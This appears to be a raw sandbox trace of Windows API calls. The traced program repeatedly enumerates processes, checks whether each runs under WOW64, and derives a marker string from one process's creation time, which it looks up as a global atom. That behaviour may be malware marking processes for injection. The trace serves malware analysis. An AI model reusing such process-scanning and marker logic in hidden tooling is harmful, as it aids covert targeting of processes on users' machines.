	[0117.004] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0117.004] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.004] CloseHandle (hObject=0x698) returned 1
	[0117.004] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0117.004] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.004] CloseHandle (hObject=0x698) returned 1
	[0117.004] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0117.005] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0117.005] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.005] CloseHandle (hObject=0x698) returned 1
	[0117.005] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0117.005] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.005] CloseHandle (hObject=0x698) returned 1
	[0117.005] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0117.005] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.005] CloseHandle (hObject=0x698) returned 1
	[0117.005] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0117.005] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.005] CloseHandle (hObject=0x698) returned 1
	[0117.005] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0117.005] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.005] CloseHandle (hObject=0x698) returned 1
	[0117.006] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0117.006] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.006] CloseHandle (hObject=0x698) returned 1
	[0117.006] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0117.006] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.006] CloseHandle (hObject=0x698) returned 1
	[0117.006] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0117.006] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.006] CloseHandle (hObject=0x698) returned 1
	[0117.006] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0117.006] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.006] CloseHandle (hObject=0x698) returned 1
	[0117.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0117.007] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.007] CloseHandle (hObject=0x698) returned 1
	[0117.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0117.007] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.007] CloseHandle (hObject=0x698) returned 1
	[0117.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0117.007] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.007] CloseHandle (hObject=0x698) returned 1
	[0117.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0117.007] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.007] CloseHandle (hObject=0x698) returned 1
	[0117.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0117.007] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.007] CloseHandle (hObject=0x698) returned 1
	[0117.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0117.008] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.008] CloseHandle (hObject=0x698) returned 1
	[0117.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0117.008] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.008] CloseHandle (hObject=0x698) returned 1
	[0117.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0117.008] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.008] CloseHandle (hObject=0x698) returned 1
	[0117.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0117.008] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.008] CloseHandle (hObject=0x698) returned 1
	[0117.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0117.009] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.009] CloseHandle (hObject=0x698) returned 1
	[0117.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0117.009] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.009] CloseHandle (hObject=0x698) returned 1
	[0117.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0117.009] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.009] CloseHandle (hObject=0x698) returned 1
	[0117.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0117.009] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.009] CloseHandle (hObject=0x698) returned 1
	[0117.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0117.009] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.009] CloseHandle (hObject=0x698) returned 1
	[0117.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0117.010] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0117.010] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0117.011] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0117.011] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0117.011] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0117.011] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0117.011] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0117.012] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0117.012] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0117.012] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0117.012] CloseHandle (hObject=0x698) returned 1
	[0117.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0117.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0117.012] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.012] CloseHandle (hObject=0x698) returned 1
	[0117.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0117.012] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.012] CloseHandle (hObject=0x698) returned 1
	[0117.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0117.012] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.012] CloseHandle (hObject=0x698) returned 1
	[0117.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0117.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0117.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0117.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0117.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0117.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0117.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0117.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0117.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0117.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0117.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0117.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0117.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0117.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0117.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0117.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0117.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0117.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0117.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0117.048] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.048] CloseHandle (hObject=0x698) returned 1
	[0117.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0117.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0117.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0117.048] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.048] CloseHandle (hObject=0x698) returned 1
	[0117.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0117.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0117.048] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.048] CloseHandle (hObject=0x698) returned 1
	[0117.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0117.049] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.049] CloseHandle (hObject=0x698) returned 1
	[0117.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0117.049] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.049] CloseHandle (hObject=0x698) returned 1
	[0117.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0117.049] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.049] CloseHandle (hObject=0x698) returned 1
	[0117.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0117.049] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.049] CloseHandle (hObject=0x698) returned 1
	[0117.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0117.049] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.050] CloseHandle (hObject=0x698) returned 1
	[0117.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0117.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0117.050] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.050] CloseHandle (hObject=0x698) returned 1
	[0117.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0117.050] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.050] CloseHandle (hObject=0x698) returned 1
	[0117.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0117.050] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.050] CloseHandle (hObject=0x698) returned 1
	[0117.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0117.051] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.051] CloseHandle (hObject=0x698) returned 1
	[0117.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0117.051] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.051] CloseHandle (hObject=0x698) returned 1
	[0117.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0117.051] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.051] CloseHandle (hObject=0x698) returned 1
	[0117.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0117.051] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.051] CloseHandle (hObject=0x698) returned 1
	[0117.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0117.051] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.051] CloseHandle (hObject=0x698) returned 1
	[0117.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0117.052] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.052] CloseHandle (hObject=0x698) returned 1
	[0117.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0117.052] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.052] CloseHandle (hObject=0x698) returned 1
	[0117.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0117.052] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.052] CloseHandle (hObject=0x698) returned 1
	[0117.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0117.052] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.052] CloseHandle (hObject=0x698) returned 1
	[0117.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0117.052] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.052] CloseHandle (hObject=0x698) returned 1
	[0117.053] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0117.053] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.053] CloseHandle (hObject=0x698) returned 1
	[0117.053] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0117.053] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.053] CloseHandle (hObject=0x698) returned 1
	[0117.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0117.054] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.054] CloseHandle (hObject=0x698) returned 1
	[0117.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0117.054] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.054] CloseHandle (hObject=0x698) returned 1
	[0117.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0117.054] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.054] CloseHandle (hObject=0x698) returned 1
	[0117.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0117.054] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.054] CloseHandle (hObject=0x698) returned 1
	[0117.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0117.054] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.054] CloseHandle (hObject=0x698) returned 1
	[0117.055] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0117.055] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.055] CloseHandle (hObject=0x698) returned 1
	[0117.055] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0117.055] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.055] CloseHandle (hObject=0x698) returned 1
	[0117.055] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0117.055] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.055] CloseHandle (hObject=0x698) returned 1
	[0117.055] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0117.056] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0117.056] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0117.056] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0117.056] wsprintfA (in: param_1=0x39937e0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0117.056] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0117.056] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0117.057] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0117.057] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0117.057] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0117.057] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0117.057] CloseHandle (hObject=0x698) returned 1
	[0117.057] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0117.057] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0117.057] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.057] CloseHandle (hObject=0x698) returned 1
	[0117.057] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0117.057] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.057] CloseHandle (hObject=0x698) returned 1
	[0117.057] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0117.058] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.058] CloseHandle (hObject=0x698) returned 1
	[0117.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0117.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0117.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0117.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0117.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0117.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0117.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0117.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0117.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0117.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0117.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0117.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0117.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0117.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0117.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0117.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0117.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0117.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0117.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0117.093] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.093] CloseHandle (hObject=0x698) returned 1
	[0117.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0117.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0117.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0117.093] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.093] CloseHandle (hObject=0x698) returned 1
	[0117.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0117.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0117.094] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.094] CloseHandle (hObject=0x698) returned 1
	[0117.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0117.106] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.106] CloseHandle (hObject=0x698) returned 1
	[0117.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0117.106] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.106] CloseHandle (hObject=0x698) returned 1
	[0117.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0117.106] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.106] CloseHandle (hObject=0x698) returned 1
	[0117.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0117.107] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.107] CloseHandle (hObject=0x698) returned 1
	[0117.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0117.107] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.107] CloseHandle (hObject=0x698) returned 1
	[0117.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0117.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0117.107] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.107] CloseHandle (hObject=0x698) returned 1
	[0117.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0117.107] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.107] CloseHandle (hObject=0x698) returned 1
	[0117.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0117.108] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.108] CloseHandle (hObject=0x698) returned 1
	[0117.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0117.108] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.108] CloseHandle (hObject=0x698) returned 1
	[0117.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0117.108] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.108] CloseHandle (hObject=0x698) returned 1
